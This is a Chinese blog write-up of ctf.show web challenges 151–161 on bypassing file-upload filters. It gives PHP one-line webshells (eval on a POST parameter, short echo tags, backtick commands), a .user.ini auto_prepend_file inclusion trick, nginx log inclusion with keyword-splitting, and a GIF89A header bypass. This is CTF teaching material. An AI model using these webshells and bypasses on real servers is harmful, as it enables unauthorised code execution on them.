其他分享
首页 > 其他分享> > ctf_show-web入门-文件上传(151-161)

ctf_show-web入门-文件上传(151-161)

作者:互联网

 

 

 抓包改个名字即可

 

同上,随便传个图片马

 

考点是.user.ini

注意上传图片目录下有个index.php 即/upload/index.php

首先上传一个1.png图片马

上传auto_prepend_file = 1.png 的.user.ini

这样.user.ini所在目录会全部的文件包含1.png

 

同上过滤了php

一句话木马可以写成:<?=    ?>等价于echo

 

同上

 

同上

过滤了[] 可以用{}

<?=eval($_POST{attack});?>

 

继续过滤了{}和;

那就直接不用一句话木马,直接system('cat flag.ph*')

 

同上,用<?= `cat ../f*`?>

 

过滤了括号和反引号,所以不好上传指令

所以用.user.ini 包含图片

图片包含日志

<?=include"/var/lo"."g/nginx/access.lo"."g"?>

这里不能.user.ini直接包含日志,原因上面说了

另外这里过滤了log所以要拼接一下

 

对文件头检测,

GIF89A用来绕过检测

 

标签:151,web,show,过滤,user,php,上传,png,ini
来源: https://www.cnblogs.com/aninock/p/15185613.html